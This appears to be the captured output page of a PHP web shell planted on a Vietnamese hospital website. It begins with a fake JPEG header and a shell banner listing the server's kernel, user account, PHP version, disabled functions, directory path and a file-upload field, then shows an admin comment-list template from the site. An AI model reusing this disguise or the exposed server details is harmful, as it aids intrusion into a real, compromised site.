ÿØÿà JFIF ` ` ÿþ
Server : Apache/2 System : Linux vps.phamthanh.local 3.10.0-1160.102.1.el7.x86_64 #1 SMP Tue Oct 17 15:42:21 UTC 2023 x86_64 User : benhviencoc7 ( 1008) PHP Version : 5.6.40 Disable Function : exec,system,passthru,shell_exec,proc_close,proc_open,dl,popen,show_source,posix_kill,posix_mkfifo,posix_getpwuid,posix_setpgid,posix_setsid,posix_setuid,posix_setgid,posix_seteuid,posix_setegid,posix_uname Directory : /home/benhviencoc7/domains/benhviendkkvcampha.vn/private_html/adminvn/templates/ |
Upload File : |
<!-- BEGIN: cp_2_0 --> <div class="row"> <div class="col-lg-12"> <div class="clearfix"> <h1 class="pull-left">Danh sách bình luận</h1> </div> <form action="comment.php?type=del" method="post"> <div class="row"> <div class="col-lg-12"> <div class="main-box clearfix"> <div class="table-responsive"> <table class="table user-list"> <thead> <tr> <th width="80"><input type="checkbox" onclick="checkall('item', this)" name="check" class="checkbox" style="float: left"/><span> #ID</span></th> <th><span>Comment</span></th> <th><span>Ngày tạo</span></th> <th class="text-center"><span>Status</span></th> <th><span>User/Email</span></th> <th> </th> </tr> </thead> <tbody> <!-- BEGIN: com_list --> <tr> <td><input class="item" name="id[]" type="checkbox" value="{lcom_id}" /> #{lcom_id}</td> <td> <img src="templates/images/khachhang.png" alt="{lcom_post}"/> <a href="{lcom_linkpost}" class="user-subhead" title="{lcom_post}" target="_blank">{lcom_post}...</a> <p><span class="user-subhead">{lcom_content}...</span></p> </td> <td>{lcom_time}</td> <td class="text-center"> <span class="label label-default">{lcom_read}</span> </td> <td><p><span class="user-subhead">{lcom_user}</span></p> <a href="{lcom_linkpost}">{lcom_email}</a></td> <td style="width: 20%;"> <a href="{lcom_linkpost}" class="table-link" title="{lcom_post}" target="_blank"> <span class="fa-stack"> <i class="fa fa-square fa-stack-2x"></i> <i class="fa fa-search-plus fa-stack-1x fa-inverse"></i> </span> </a> <a href="index.php?m=2&sm=1&edit={lcom_id}" class="table-link"> <span class="fa-stack"> <i class="fa fa-square fa-stack-2x"></i> <i class="fa fa-pencil fa-stack-1x fa-inverse"></i> </span> </a> <!-- BEGIN: com_reply --> <a href="index.php?m=2&sm=1&reply={lcom_id_reply}" class="table-link danger"> <span class="fa-stack"> <i class="fa fa-square fa-stack-2x"></i> <i class="fa fa-comment fa-stack-1x fa-inverse"></i> </span> </a> <!-- END: com_reply --> </td> </tr> <!-- END: com_list --> </tbody> </table> </div> <div class="phantrangcuoi"> <div class="phantrangcuoi1"> <table> <tr><td valign="top"> <select name="action" class="form-control" style="width: 120px"> <option>Lựa chọn</option> <option value="1">Xóa</option> </select></td> <td style="padding-left: 10px;"><p class="progress-demo"><button class="btn btn-success ladda-button" data-style="expand-left"><span class="ladda-label">Thực hiện</span></button></p></td> </tr> </table> </div> <div class="phantrangcuoi2">{lc_paging}</div> </div> </div> </div> </div> </div> </div> </form> </div> </div> <!-- END: cp_2_0 -->